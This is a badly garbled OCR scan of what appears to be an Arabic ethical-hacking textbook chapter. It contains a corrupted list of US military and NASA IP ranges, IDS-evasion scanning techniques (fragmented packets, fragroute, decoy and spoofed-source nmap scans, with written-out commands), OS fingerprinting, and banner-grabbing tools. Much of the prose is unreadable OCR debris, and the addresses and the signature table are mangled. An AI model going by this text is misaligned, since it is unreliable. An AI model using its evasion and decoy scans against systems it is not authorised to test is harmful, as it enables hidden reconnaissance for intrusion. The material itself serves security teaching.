126. «Q.0-Q Amy CoTTimurHcaliorts BednDoics Command 
128 102 0 0 NASA Allies Resesfxh C-antar 

125 HSO.O NAS*, Mcadqiucwtcra 

iza moo nasa waiopa FHgnt Faciirty 

126 15S.O.D NASA Lano>ev Reseaxh Center 
12S. 156 O.Q WAS A Lewra Nefwcrfc: Control Cenler 
1ZG 157 0 0 NA5^Jt#ini«i Spwctr Cento 

126 158 NASA Ames- Research Center 
I2fl 159 0 0 MASA Ar«a R**«rch Center 
i>8 16OO0 Nos/oi R**«rch Ljotooraory 
12* l&l O 0 NASA Ames Research Center 
128 163 0,0 NASA Goddard Space Fbaht C enter 
I2fl 202 0 Q 50th Spata Wing 
OUIOIU MacOi A* Fwe e«e 
1262170 q nasa Kennedy space center 
128 236O.0 U S Am Fare* Acadmry 

RAMOE 129 

123 2^0 O Stri<e»>c Defence Initiative Oroornizaman 
12&.2&.0.O Unrtw Sta.«>&s Miliary Academy 

123.5O.0.O NASA Mar^naii space Ffrght center 

123.51 .0.O Pattid; Air Force Base 

139 53 D O Wrignt-Pafclenuzri AJf Fcrce Base 



123.53.Q □ - 129.53_2S5_2S5 SSSFTG^SCB 
123.54.0.0 vandenberg Ar Force Base CA 
1 29 92.0 O AJr Force institute of TecimoHocnr 

NASA Afdbq ReBflo^h Oanter 
123.131 MM tm.nM Weapons caw 
129 163.0.0 NASA/Johnsor Space C enler 
1S1tJ.Q(l WASAIW 

123.ieS.D.t) NASA Oodderd Space FTsghl Center 
129.167.O.0 NASA Marshall Space Fh^fit Center 
129.163.0.0 NASA Lews Research Ceiter 

129 ISO 0 CI N^^ri Uhdenrat? S^tems Centef 
123.19O..O.0 A* Force FBgnt Test Center 
129^09.0.0 Army EtarfSstucs ResearcJi Laboratory 
1-W TO J1fl US Army Ccvps of E 
129J2S1.0.0 Untcd j 

RANGE 130 

1 30 4O.0 O NASA JoHn&cn Spx« CeHer 
1XJ9C O O Mdthe* Air Force Dine 

130 109 0 o Naw«i coastal Systems center 

130 15J 0 0 Hcrkfryvwell De«am« Sv*tefnft Gmup 
iXtitS.O O ir.S.Army C«p* of &^jw iira 
13O.ier.0 0 NASA heKkiuanen 

RANGE 131 

131 6 0 0 Lor^o Ar Force Goee 
131 lO.U o earifsdaie ajt Force &»e 
111 17 0 0 CNeepard Aif Fore* Base 

131 21 O O Hahn Air Bsc* 

31,32.0.0 3T Ccmnm 
131 36 0 0 FiMrcma ajc Force Base 
131 36 0 O YoVota Ajt &sse 
131 37.0 O Elmendaf Air For&e Bw 
131 .36.0 0 l-Iicfcani am Face Base 
131 .39.0 0 354CS*SCSN 



RANGE 132 

132.3.0 O Willinms Air Fcrce Base 
T32.5.D.O - 132.5.2SE_2SS -Hjth FKghta- Wrig 
T32.6.D.O Ankara Air SEMion 
1 32.7.D.O - 132.7.255:255 SSG/S3NO 
132.Q.O O 2atti BcmLs Wing 
t32.1O.r>.0 313 Comm Sq 
132.11.0.0 rteJleniluon Air Ekse 
i32.12.Q.O Myrtle Beach Air Force Base 
i 32.13.D_0 Bentwalers Roy^ Air Force Bse 

3Z.14.Q.0 Air Force Concentrator Netmort. 
l32.15.rJ-.0 Kadena Air Base 
1 32 1 R U 0 Kunsnn Air Ba&e 
t32.17.D.CI Li ndsey Air Stacks 
t32.lB.D.d Mctiuire Air Force Base 
132.19.0.0 I D0C5 fNET JMILDEMHALL i 
I 32. 2D n o 3.5th Communicaticns) Squadron 
132.21.0.0 Pkrtlsfljtjrsili Am For« &kk 
1 32.22. 0.0 23Ccmmunicaiions Sq 
132.34 0 0 Dover Air Force- Prr^ 
132.2S.0.0 7« CS^SCBW 
132.27.0.0 - 132.27. 253. 2SS 33CS/SCBSN 
132.28.0.0 14TH COMMUNICATION SQUAJDRON 

132.30 0 0 Lniss. Air Force Base 

132.31 0 0 Lottie Air Force Owe 
1 32.33. 0.0 &0CS/SCSNM 
132.34.0.0 Carman Ar Force &a»« 
1 32. 35. 0-0 AKuo Ajt Force Baese- 
02.37.0 0 T5AOW 
T32.3B.0.0 GcocfellOW ArH 
132.39 0.0 K I Sawyer Air Force &3we 

For a complete list, see the file in DVD 
IP ADDRESSES YOU SHOULD NOT 5CAN.txt 



PORT SCANNING COUNTERMEASURES ^» o**& c> ^ 



,^.I^a11 Ia jjc. j 4^. jlq^ll iallAll j 6L_fljjJaAll ^IajojI j XP u^j^ c ' lS^° SajLJI djUi jIxaII J4JS13I jSjj iallAll (j^a^a tlLLui ^jjja jj Ia£ 

nit ji ^uji ^u^i ci&Aj U£ < . c 3iaii 

• aJU3| J4j|^i3l (J^flaJ (Jj^la {jC iaLiAll (J^a^a AjJa 

.4^111 C5^^J (detect probes)^^£^ CP- < g-ila Laj 1^ jjlj jl c ^i4jj ajIa^JI jl^ 

AjLa^JI ^jlj^. (J^asu /o^^aII ^cl jail ^Ja AX. ^a^a AjJ ^jl£ (ij aJL^JI L-Laiai ^^ic (J^^^J (jl j\j 4jU^J| (j^ C5^^^J 
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'SYN scan <> <-*5*ll 

.FIN scan U-3 c>Ui^ >Vl c>"JI 
^Ikj 3i ^^kiaiJI (j^aailt 4_iLc ( LS&I I ^^i^jj (Network intrusion detection) ^£^13 JLult 
cJLul! ^i* j L_a^3 (http://www.snort.org) Snort j^j <Nmap ^ j^VI j^*j ^JLj^ i> ci^ftll 

. I j^£ ^ uj^ t> yr^ J 

AAIg ^1 (JjJjia (jC <J jaJl >aJ g all <JjLaJ dlia I ^J° L t , ^J ist-L<Jl J^ $4a* J^-a (j' ^Jt-llj 4_}jjjjJa3l islAxJl JaSS 

^ jill IC1VIP li^JJ S^jl l^-C-l jjl ^J^J IC1V1P A-!^J Ajjj^aJ .4 > a Acl j£ <C ja^ a £a (jfi 2 ^ (j^ (jfi^ ^ J-^ 

. routers*^ j^t *j$^j <jUaJI jl j^ <> (unreachable message) Sj^U-all 
.source routing tech. ji specific source ports ^l^ki^U U jjtaJ j£^j V sjftllj ^AJl J i> 

(jjj^j ^j^il ICMP <UDPj TCP ftv^ml 4> o- 3 ^ IP u ( j^- cjISUj jW^> 

.ftj ja> ^<J| iflllftltj jL^ajVI 

Ac I j3j ilAlpaull jaL 2^ dAA AjUaJl jljAa. jl (j* Aatjfl ikl^VI Aj3 4_jjLaj3l AjLaaJt jljAa. lij 

.ajU^JI jl^ ^3^1 cjUjj J ^^ki^i V fastmode cjU^j t^^i antispoofing 



SCANNING BEYOND IDS 3.4 



^> u^V3! ^ lJ^j ^Vi ^1 Intrusion Detection System J jU^i ids .ck^i 

(IDS EVASION TECHNIQUES) IDS c> 
tjA (jl (fragmented probe packets) ^ ^l^i^l ^ a^uxj IDS t> mj^^ 

.iS^ill (j-a^i ^ ja. J^ILV (spoofed fake hosts) u^* 
(Use fragmented IP packets) fj^t ^jSj ■ 
^ s^cLouj m (session splicing)^ ^ Sjj^ 5J5L^ cj! ^^^11 oi^ .IDS cl>^ mj^ 3 ^jj^i l-jJLojI ^jj^I^aII ^^lun 
o^cLauJI <j ^U^3I ^^3' clA^ . JL^ajVI jl tiL ^j^alaJI c Ljja^ll ^ Aia^l<JI (jiaall ^ja. 5il£ <jjaJ tfragroute 
tol^a^JI ^3^^ a ? ^ * A ls* cJj^ IDS j^ju^jI c a .Nmap ^3^^^ ^ t° ^^^^ o - ^^^ 

ftAa.j (il!^Jjuj| *6^U j ^glc 11a (jl LaS" 

(Use source routing) j^a^t ■ 

J^Lk ^ 4^ jaJt ftikjj ji ^5^!^ ^ill (jJjiall J-^l ^J^ >' U J-^ gr^ J (SOUrce routing) jAj^JI 4^ jj 

_4_xi^^J] jLabG (JjJafll ^.^J (j£-GJj ;<£jjuall L_fl^)su 4^^aJl j Lua^a (jl (jia^)IiL<Jl (j-o3 _4^Jjuo3I 

(SYN/FIN SCANNING USING IP FRAGMENTS) IP FRAGMENT ^I^L-b SYN/ACK f> ifllUI 
.(probe packet) jSaull <^ja. AjjaJ ^jj dii^ '.<LLA\ ^-aaill l-iJL^V Jj^*j j& 6 jU^ IP 4Jjaj ^1^1-ubSYN/FIN u^^t 

^Jc. ja* *^J^ ^3^^ ( ♦ 1 - M1 - 6 L^^>^^^ (j^aaill CjULaC (j-d <jila^3l 4-ijla.jVI ^cjllill ( ; llaaj J ja. jll j;ia. l_j jLojVI f-La. 

Jl I^LajJ ^jj ^Ij (probe packet) c> Va? ^ *^ JjTCP header ^SSj ^jL cjjLiVI li* J .^^Jl J^J^ 

Jliiil 4_Aac. ^1 f.U3) JjVI ^jaJ] ^^a. jllj j^a>JI ^jTCP header <J^ ci^^ C5*^ -(O^ ( „ t * a ^^ 

sjltV i ij.nMl ^ ^Ij 4 aJU3I a->1I (TCP or UDP Flages) ^j«3ll fS .(octet 64, bit 8) :^ 

Jl^Jl JsaJl S^cLolaj Sl^a-xJl dlliUJl ^3^" L -^^>*^ C5^^ l3^£j] J j£ jj j^)J A-ila^j *6^a. j J^La ^j-<i ^!^JjojVI ^3^^ 

Fragmented PacketsSlj^l 4-a>JI • 

<JiLa <xi jixi jjc. £tjti3 iaa.!^j ^jUa-Vl J 'u^j .J^^VI a< ^;-' JS!u3 J^lj & jj* ' ^ s-l Jj <<u>.>^j Asu ^XCP Header 
J;iiaJ Jc *6j^3l V jjiijja^ll jiasu .^iLJI c_ijLa. Jc IP ^^aJ Asu (IP header) IP lhU J ^^^^ ^ j^j 

.DUMPS^ ^^J**' 1 jW^ 1 ^^J C5^- 6 <-!^*-^ ft^lcj jl (JJaxJ ( . UjujJ A3 Uui j tSl^a^Jl j^Jl ^J^>1 ft^lc-jj 
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Fire wall <j)j^ • 

^jL, jjfcll w ^Ij ^Lkj ^ V 12m, J Jz. to &A sljj ^ CONFIG_IP_ALWAYS_DEFRAG 

.l^iSS j 5^>il SjSla ^jjH 12a <> Je. * jiS fc>3!l <jj£ U Ulli <(IP/TCP Header) TCP j IP t> 




SYN/FIN {Small IP 
Fragments) + Port (nj 



ft ST £11 port is closed) 




Attacker 



Target 



SYN/FIN Scanning 



#nmap©-sS©-A©-f©192.168.168.5 



I^VIS <u jaJl <j j^j ^ JaxJ [_f] jjjjuII ^l^klojl JjjL cjc NMAP ^ f3j 



. IgJLoij! s^lcl j <L* y*l\ Ajj^j ^ Jjxjujlll <j^alA IDS jW-*^ ^ j^' (j-* fragroute St«ftfl 

jlj^ t J1>.hj11 i^:£3 a£jj^3I 3 jUlkl ^ S^LuuJI 4jj (j^j staVl *>i& ^ .tgic l_L^3I ^ IDS <-Jaji 

.^uVl TCP/IP l>-^ ^ j^j 
[fragroute [-f file] host] 3^l*Jt Ji^ll o 
l^UI (j* V^j U L_aL <j* (jro^qll ^USll <j ^aUJI(rulesets) ^ jL j*j frageroute J*^J ^v^n —file jW^' 

.[/etc/fragroute.conf] ^^Ij^V! 

tL-flLl! 11a jll j .fragroute lUc- yr^ j t> ^ >^ ^ [/etc/fragroute.conf] ^-al^l 

.man 130^ ^-^^ cjI^ jll ^-1^ aJc < . l^j L* fragroute jj^j l^i 

f^^j V j cJ^SI Jl^JI ^1 ^5!^]! JU^^ c> sLiiall ^ jaJI ^ iaitf 6 jjjb jjSj ,fragrouter ^Fragroute 

.IP_Forward 

cjKu^II' ^ i—iL^a j c ^j3I djU^JI ^ ,\iqVij ^ j^j .IDS l!^ cJi^^ <■ * q> ^ l>° Mjf^' l>* fragrouter SUV) 

,a£jjoJI <jc.j!^j 6*L<»^JI ^jUi^Jlj 4l_j^j3Ij ^-Ij^VI' '4-L<»Vl 
^ ^ j jjoiI ^jfl Jl jj V t JLaull c ftjjj^l a£jJo3I ^^ic A-i^-Lq ^iikj !>L»I ^lijJ! 11a ja! 

^I^jc-VI ^ j '(S^ j^^j) 6 jf^ ^Uaill (jjoii ^^Jc jl^j ^^£3 ^Ulloj. ^ii ^jj ^1 fragrouter u*^ j .^j^^ 
[fragroute [option] ATTACK] ^1 o 

.man j-VI ^jia u& -u&ai ^211 optionj ATTACK 5^ ^jj 

CLOAK A SCAN WITH DECOYS C^ 1 ft-^-W ^ u^ilt 

I J-«jij ^ n^lj CluS ^il! (deCOy) L-Ludai ls 1c jl t flJ - ^ a ^IjI ^^Sc AJ*JI t aj^U^U j^JaJ cilLt^J t^aaill ^ ^ jill I^A JJAJJ 

^jxi ^1 L_ fl^>*J (jl U^J IP cl^J^ c ' C-I^ (j -0 10 - 5 ^^<J^ (J^^ < te5 -l c - J^J^ IDS C5 ^ > ".- .4i.^Jjaa>Jl A£jjaJ! (j^a^ij 

CjU3V1 (j-* Iajjc.j ' (router)^- ^-^^ cJ^-^- cl>^ ^ (j °; (jjjUxJI d^a 

^QjQ^^ IP (jl jjc £a ^Lai£ a ^ I^JLuiaSI 4_atL^xJ! ^jjjUxJl <c. a Ajujj [-D] J^*j11 ^uJ j ^a^ill (j-d ^ jill I^A ^1 laJLujj ^jj 
I^Vl^ t^L (j^aliJl C5 liiaJl IP (jl jic (jC JAxJ ME ^l^klojl 1 - gaJl <Lj - <L^aL jJ jj^aLd tiL (j-saliJl 



#nmap©-sS©-O©-D©192.168.168.5,192.168.16.1,192.168.168.20,192,168,16,30,ME 



SPOOF SOURCE ADDRESS cA^- 6^ f^^A 

(jl jjc »-a [-S] JJJaull t 3JLJ| 

. J^U (> ^>JI JLu, J ^ ^ jj ^311 ^| jll IP 
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,^I^jjojVI l^gJ ^ ^llaj L_a jjuj -Pn jjj* *^l j -e jjj* *^l) (j^Ua IjI^ 1 g > ^ij l_a jjuj aSjjui lS^^ .u^^^W <j-a 



BANNER GRABBING 



.ASjJoII (jljlkV (jJ-^l^All J^Ja* ^ £>i& JS .IDSj 6 ^ jfcall CjIjj Jl/ialixJl J <j* -ja^lU 4_iiLS UuiflU ^3 jVI J^ 

<M\ J&n lJ> < BANNER GRABBING ja ^VIl c5 >1 sbl 
b jj*JI cJ^Jl Jc Jaxj ^ill Jji^ulj flkj ^j^il ljJJ OS fingerprinting U^l ^Jc J^ Banner grabbing 

.(J^T-Jilll ^Uaj jIAj^I Jc S^lc AaIxJ l^ilc Jj^x-Sl J^l L_a*jJa3l Jallj (jl ( -LoiJ tillil j .JjljlkVI 4_iLoC ^U-J 

^U 4^ (i^j^ jl ftp JU La <U^h JUaSVI <3jU^ (banner)^ Jl t> ^1 jjSi> Banner grabbing 

.yc. cjjL jll ^mll ^^il /bin/lsJU binary 
^ JSVI(fingerprinting) cjU^JI .fingerprinting f\mAi ^2 Banner grabbing 

^Li^l l^ajjaj < a^J I iS^S ^>JI lUjj c^ill <(stack querying) cjU^Ui^VI 
TCP ^> lUJ lU^j (TCP stack) TCP ^ U^^ (stack query) c^Ui^V! ^jS JjVl '^J^\ 

.(initial Sequence Number) ISN lSj^*v l -^^>*^ ^^3i <L^ia3| a jI aJLujVI (JjI^j L_fljjJaxJI jl^JI ^1 <±xAj& j^*3^ $>\ jjuj 

jli a 6 ^ .(TCP Stack) TCP ^ s^jJI ^ui jJixJI *\SjVl ^j1^3 j^ ^ cJ^ikVI ^ ^ijjJJi ^ 

JjLojj <j! a^Loal (JjlVl ^L ^^JtJ ^ICIVIP (J ^lAaJLujlj 66^J^. <L^)Ia ^J^A.TCP l! c^^- (jjlajl uA\ ^jJJflJ^lall 

.jjll ^jjB ^ ^ixJ! Uli^JI ICMP ^ j J^jj c> > j .(ICMP response analysis) ICMP 
f inn ^j^VI Aijjiall . (temporal response analysis)^ jit ^Ui^VI JJ^i jVI cjj^ll 

t \u'^A \ (retransmission timeout) (RTO) ^j^j ^ J^t <jUi^VI .TCP Jj^j^jj^ 
(j-o <c jA-\ a l^jjjlift j djUUJI ^ja. J^i^ -^i*^ (Banner Grabbing) J^^-^t ^Uaj ui jauU (j^^j^ 3 

j| ^ axuxj j Active OS Fingerprinting j ^jVI ^j^jt Jj*JSj1I a-J^V signatures 5^' j^ll 

(logs) J> dlaLft ^ oUlxi La (Jja > >n ^ t ; ijunjm ^il! j ^UajJl ^ Jc-lilll <Lj]a3l t^jll <JJ^ j ^ > ^ a\\ £y* 

P ja. JLoj jl ^ ^UajJI ^ UIlj cj^j ^ill iaU^I C5 ic^ axuxjj Passive OS Fingerprinting ^ ^ j*^ <Jl^l 

.FTP ^ lUI*j3I Packets 
Active OS Fingerprinting (Active Banner Grabbing) *t 
s^lJ! TCP ^ ^ j 13 6 ^ j J^-^l ^Uail ip Jl Ju cJjlill IalJI ^iLau Active Banner Grabbing 

_5iiikJI CjI^jJoI! L^JtjJaJ JjxjuxiII ^ <ilaJl C5 lc TCP/IP J^JJ^ <illkJl CjljJjoijll ( . UjujJ LuaJJ IIa .(j-ala. (JaJjj 

djUUj ^cl j3 \ > >i jj ^jal jiill ^j-<i jji&ll ^ ^ L - u ^ ^^>^ '^ x ^(signature) ^'■^^ ls'^ j& u^^-^^ ^ 

.Xprobe2 j Nmap 4» ^ » ^iJ t cjI j^VI \^^Luj 
.cjLUj s^claj ^ j^jll <jjlL<i t^xJI t LuiaJl Lg-Loij] ^jaJI ^ ^ jiLa ja^» ^ Active Banner Grabbing ^ 
^jUuli f% .^jL^j J^U t> ^ Banner Grabbing j' OS Fingerprinting 'Nmap ' J^J^ 
> US 4^ US cj! jU^VI ^ ^ JS .(Port unreachable) PU <T7 'T6 <T4, T5 'T3 'T2 'Tl J\ m 

- www.packetwatch.net ^ cjUjVI J^U c> 
^jj^iiia ECN-Echoj SYN (flages) ^U^UJ! ^ TCP JUjI ^ aJj .Tl aJc ^ JjVl jU^V! -1 

TCP 

11a . c TCP ^ jj^/^ (no flages) ^U^ J ^ TCP JUj! ^ ^T2 ^ ^ jU^V! -2 

.NULL packet ^>Ji c> ^j^^ 

FINj SYNj PSH j URG (flages) ^U^UJ! ^ TCP ^> JUJ ^ <T3 ^ c5^j ^» jW^VI -3 

.CJ^ TCP ^j^/^- 

. c TCP ^ jj^/^ Jl ACK (flag) TCP ^> JUjI ^ a^j ^T4 ^ Jll*u ^ Jl jU^VI -4 

. J^ TCP ^ jj^/^ Jl SYN (flag) ^^UJI t- TCP JUJ ^ ,T5 J^Jj o-^l j^VI -5 
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. jliL. TCP ^ jji/'^ J\ ACK (flag) t- TCP V> J^j' »T6 <Sp cS^j o*^ 1 jW^VI -6 

cjjji/xi* J\ FIN j PSHj URG (flages) ^LOJI ^ TCP JL-J ^ <T7 <^ ^A-Jl jW^VI -7 

cS^TCP 

ci^il .jLl. UDP ^jjj/^ Jl UDP *-> JL-jl (4j <Port Unreachable) PU ^ u« m jW^VI -8 

.(_a^Sl (> [ICMP port unreachable] <^ jll ^Ij^iJ 

*2>l3 aj^j jbiLVI lj* JjUj dy* .TSeq (TCP sequenceability test)^ Nmap ^ ^jll j^Vl jUSiVI 
.TCP ISN sampling *i jj^l ^SjSfl TCP J-l*-3 ^ <_UU3l *Ual LUI - 1 
.IPID sampling ^ <-«jj*^ (IP Identification number) IP ^Jj*^ -2 
.(TCP time stamp number) TCPU <>jll ^1 -3 
t cj| jbikVI (> ^jliill Nmap ts^y J ^ -c i 5 *-* TCP ^i<J SYN 4^*11 <*-« TCP lift *l j*.] & 

." No exact matches for host" o^j*^ Nmap t<->ULill S^cla ^ J& jjjxII pl> ^ lij L»i .Auull JjiJS]! 

ajtfs . JL^jVI t-lUa Jc Jjll <iUji TCP CjlajjiaJ ejllkj (^ill(ISN) J J^' j»^J^' cs^ <3jja-« JaUji jlaJ I j& L_a^JI 

'IRIX 'LrtJ^ L>° <— dlljlAk^aj) <Lul jjjC CjbLjj '(j»J^all UNIX) 64k ^J\^°~'^ J^> SApC ejlc j--^ - Jl Iftiui aJ (jS-aj 

.(.£]) «dn*Vl AIX <OpenVMS <* .2.0 c>^) cP 1 j*** J 'U^ 1 U J^J 'Cray ^ jM UNIX <FreeBSD 

jSjjaJSl jI^j Jj ISN [time-dependent] g± j>%^ 

A^l jjujc <L^)iaj IPID ^ ikiujj 'OpenBSD cJ^ 6 uj^>^^ -W^ j^j^ IPID ^ ci^*^ cJ^^uull ^ &]aji - <> 

IPID ^ V jj^j^^ .'^j^l f^*' ^-^^ (4j ^ cr^^j ^^^^ u- 0 IPID=0 (j - iki^ j^VI (jiaxJIj 

"0 = uj>^ aOOOHZ J dOOHZ ^2HZ ^#ai uj^ l«>VI .iA V o^h. c^J 31 

Passive OS Fingerprinting (Passive Banner Grabbing) 

http ://honeynet.org 

ai^j <ji^ioj^U a a\\ Jj xjuS jII ^Uaj (jjla j TCP/IP ^ 3ilia^lt cjlinJalll iiLaij Liajl 'Passive Banner Grabbing 
cj^Ji ( LuiaJ ) ^j^JI ia^iL tcJ^JI cJjjjaJl (j-a^i ^ V^j tt^li .Active Banner Grabbing ^j^J^ 

„ (JjjuujJ ^aUaj (jC t a.^<1 ^j] 1 g j£ 4_^jJa| j]| djIjUjjyi Sniffing L^^A 3 CP 0 

jl jl! a^>J! J^ Jjt >ait e Uij l g mj ^1 (Time to live) ^^J! ^ U - (l^^LJI TTL - 

.J^\ Jji^ull ^Uij - (SjstJll f?L*.J Windows size 

djUja jjII J £fj s>'±& L5 lc laaa jj^iij V j taib jjlj jl c_4aj Passive Fingerprinting 

l^j^^i gr^j(sniffed packet) sniffed ^-kJ jj l^lalisll ^ JJ^s > JjU .aS^II lA^ ^CjUjkJ! ^aJlj 

. ( http ://old.honeynetorg/papers/f inger/ ) J passive fingerprinting c> J ^ 

04/20-21:41; 4a. 129552 129.142.224.3:559 -> 172.16.1.107:604 
TCP TTL: 45 TOS : 0x0 ID: 56257 
*** F ** A * seq: 0x9DD90553 
Ack: 0xE3C65D7 Win: 0x7D78 

Based on our 4 criteria, we identify the following: 

• TTL: 45 

• Window Size: 0x7D78 (or 321 20 in decimal) 

• DF: The Don't Fragment bit is set 

• TOS: 0x0 
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cjUU SjpIS) Database Signatures 



# 

# Lists of 


fingerprints for passive fingerprint monitoring; 






# Updated 23 May, 2000 

-V- 












# Mail your 
# 


s i gnat ure s 


t o Lance Spi t z, ne r < 1 ance @ spi t z, ne r . ne t > 






# OS 
t 


R5 1 ON 


PLATFORM 


TTL 




WINDOW 


DT 


TOS 


DC-OSx 


1 . 1-95 


Py r ami d/Nl LE 


3D 


8192 


r. 


O 


Windows 


9x/NT 


Intel 


32 


5000-9000 


- 


o 


NetApp 


OnTap 


5.1. 2-5 .2.2 


5 3 


E " 63 


- 


o 


HPJetDirect 


■? 


HF Pri nt e r 


5 9 


2100-2150 


_ 


o 


AIX 


4.3.x 


IBM/ RS 6000 


6 3 


16000-16100 


■_- 


o 


AIX 


4.2.x 


IBM/ RS 6000 


6 3 


1 6000-16100 




o 


Cisco 


11 . 2 


7507 


6 3 


65535 


y 


0 


DigitalUnix 


4 . 0 


Alphs 


6 3 


33580 


y 


16 


IRIX 


6.3C 


SGI 


6 3 


61320 


- 


16 


OS390 


2 . 6 


IBM/S3 90 


6 3 


32756 




o 


Relisnt 


5 . 43 


Py r ami d/ RM1 0 0 O 


6 3 


65534 


r: 


O 


Free BSD 


3 . x 


Intel 


63 


17520 




1 6 


Jet Direct 


G. 07 . x 


J3113A 


6-1 


5804-5840 


r. 


O 


Linux 


2.2.x 


Intel 


63 


32120 


y 


O 


OpenBSD 


2 . x 


Intel 


63 


17520 


r. 


16 


05/400 


R4 . 4 


AS/ 3 30 


63 


6192 


y 


O 


SCO 


R5 


Ccrrpaq 


63 


24620 


r. 


O 


Solaris 


a 


I n t el/ Sparc 


63 


24820 


y 


O 


FTX (UNIX} 


3 . 3 


STRATUS 


63 


32768 


r. 


O 


Unisys 


X 


Mainframe 


63 


32768 


r. 


O 


Netware 


4 . 11 


Intel 


128 


32000-32768 


y 


O 


Windows 


9x/NT 


Intel 


126 


5000-9000 


y 


O 


Windows 


2000 


Intel 


128 


17000-18000 


y 


O 


Cisco 


12 . 0 


2514 


255 


3800-5000 


r. 


192 


Solaris 


2 . x 


I n t el/ Sparc 


255 


8760 


Y 


O 



Jl li& .45 l£ j^-^ Ia^j (^jII j sniffer trace ^Jajuil jj mi j t^ull L_LLjaxJI JjS ^ ^La^vim^l TTL ^ 

.64 <^ J <^»Vl TTL diia. 4lJ^JI Jl Jjj^jI] 19hops c> <^>J! ^ 

^I^JI cjUjii jilll ^-Uai ttilli FreeBSD jf J^oll ^11^ <-ajaJI Jt^jl ^ 4il <li& TTL 

^iiilU ^LSII ^ jL JS lil .Aiaull < LuiaJl Jl (JL^ril c_jisu) traceroute TTL ^ .(^-M' *^ U^ 1 ^] 

hops c> o^t J ^ j J\ hk^ 30 J^s yr^ 1 TTL ^ ^ (jL*JI jjE) Traceroute '(stealthily) 1 ^ 
ja jA\ tilli ^ Laj) jLoi^ll CjLg jlx-d (jc t flju^j <Ljia3l traceroute ^l-^-l .(-mjUill ~i n^i.m ^ ,.iit^3I < ^ 

< fln^M U g-I}^ (j*xl oj± (upstream 
(SjjUM ^a) Windows size 
^1 j <SUi ^ j^l ftbl (windows size) SiaUIl .(compare windows size) ^iaUll ^U^l <j JJL ^ S jiaiJl 
(windows size) siaUll jj! ^LaJI JIUI .Ia j^u c aj£ j 1^1, ^vi ml ^5 c _*i3l siaUll ^ ^j^all j 

aM^1\ J\ J^j Solaris j FreeBSD j J^JI ^ ^^i^Jl ^1 siaUll ^ ^0x7D78 ^ ^ 

. JjSjj jjJI I1a *IaJ t*Ui j TCP Jj^jj jj^ (j-aUJI Ajj^jII ^UiL^xJI ^Lkb ^USII ^xj (jjjja lil j5£l ^j>^ij iaUll 

Session Based 

JS1 vn,,^ jjSj j! j^jj <jV I Cjli Ljajl TOS .(OpenBSD J SCO J^) DF r ^^^ V ^1 
u^j 'TOS J^-^ii ^ jjiiill ^Ua ^ t^j^l SjUxjj .operating-system-based c> Session-based 

cjUUj s^clS ^1 ^Uill <ijLLa til^j d^a. tSiflUl! ^a j TTL \: Jl taUU ttillilj ikl^ J j£ jjjjJI 

.(x.2.2 *^ y ;<SUJI d^a ^) Jjt flat ^Uaj 
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cjl qnWrt l ^IjH t V J .± jjSII ^ Passive fingerprinting 'Active fingerprinting JL^ll j* U£ UUj 
Jajjja ^ ^isu c Luia^ Ijjmi injmj tUjtj , J^Luiill ^1 laj£ dilsuS jiill (jjaij (^Jl 'nemesis 'hunt 'Nmap ^ a^A-^W f^isi 

. f >]| J* TOS J DFj iSiiUM ^ <TTL 
.Stealthy fingerprinting ^l^i^l (vp^j jSII .ls j^S j 1 ^ ^ -ul^ki^l jSaj Passive fingerprinting 
liA .sniffer traces <J^^ ^ ^ v^i ^£LJI ^ 4 ^> t . ilia] iasa ^li 44-13 j ^aLq ^ a^Ji JjxjujIII ^Uaj ^j^j] 4 JtLJI 
a a i^IujI (J^-aj Passive fingerprinting .^illk^ll IDS ^lixJ jj I^jc c q/^ll a laAj stai J ikiLmi J] <^.LaJI jjL^jj 

^ uj^ ^ 4^!>La3l!I cjVU^ajl pUj o^lcU <jL<LaJI ^jlj^a. ^US ^j^j .^jIa^J! ^jlj^aJ (remote proxy) Ljajj 
Passive fingerprinting ^l^aJLual dLuuuijAlI .liAjui l^lujSl Lq c ^j3I dlauS jiill hliLm! IDS 4J-*aJI ^jlj^ aAjjl* 



^BANNER GRAPPING I3U1 

BANNER GRABBING TOOLS 

J«j cj| j^Vl o^o m( $jJ\ cj| j^Vl (> aj^JI ja jjj .cj| j^Vl s^L^ BANNER GRABBING <£&*i 

: ol j^Vl e iA Js. ^1.1 Uij <^ BANNER GRABBING 

ID SERVE 
•om 

.^J 'NEWS ,FTP, SMTP, POP <JS- HTTP (^3^1 jjfc) 



ID Serve 



Internet Server Identification Utility, v1 .02 
Personal Security Freeware by Steve Gibson 
Copyright (c) 2003 by Gibson Research Corp. 



Background Server Query | Q&A/Help 



ID Serve 

Ultimately, the security of your personal 
information is YOUR responsibility. 

The Internet is not a safe place. 

Just one look at tasteless junk mail, Outlook viruses du jour, and uninvited pop-up 
advertising windows should convince anyone that the Internet, circa 2002, 
remains a wild frontier. No one doubts that "the Net" has tremendous promise, 
but many frequent Internet users remain justifiably cautious about extending trust 
beyond their own keyboards. Since confidence and trust is gained through 
knowledge and understanding, I am working to empower end users with accurate 
information and simple tools designed to demystify what lies beyond their 
computers. 



Goto ID Serve web page 



Exit 



Background SeiverQueiy QaA/Help 
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? ID Serve 



■ ps. Internet Server Identification Utility, vl .02 

| 1 O t*\/0 Personal Security Freeware by Steve Gibson 



Copyright (c) 2003 by Gibson Research Corp. 



Background Server Query | Q&A/ Help 




Enter or copy / paste an Internet server URL or IP address here (example: www.rnicrosoft.com) : 



(2 [ fluery The Server 



a When an Internet URL or IP has been provided above, 
™ press this button to initiate a query of the specified server. 



Server query processing 




a 



The server identified itself as : 



Copy 



Goto ID Serve web page 



Exit 



_ jajj^Jl JJ^i 2 £J>\ Query The Server ^ k» > ^ 



? ID Serve 



■ Internet Server Identification Utility. v1 .02 

If ^^f^ lT\/i& Personal Security Freeware by Steve Gibson 



Copyright (c) 2003 by Gibson Research Corp. 



Background Server Query Q&A/ Help 



Enter or copy / paste an Internet server URL or IP add xample: www.microsoft.com) : 

' 1 | http ://www. ce rtif i e d h acke r. co m/ 



r 2 



[ ^ Query The Server ^ ^ 



press this button to initiate a query of the specified server. 



Server query processing : 



Server: M i cm soft-l IS/6.0 

X-Powered-By: ASP.NET 

Date: Thu, 27 Mar 201 A 04:1 2:1 7 GMT 

Connection: close 

Query complete. 



(A 



The server identified itself as : 



|MicrQSQft-IIS/6.0 



Copy 



Goto ID Serve web page 



AMAP TOOL 
https ://w ww.thc.org : j^-a-JI 

^cjIjj Jl ^>^^ ^ trigger cJ^jl (jy^A 3 ^ j^JI ialixJI/cjljjjJI Jc <J-g*j jll cAinLiill aj,i^j J oJ. ^ 



tar -xzf amap-5 .4 . tar.gz 



# cd amap-5.4> 



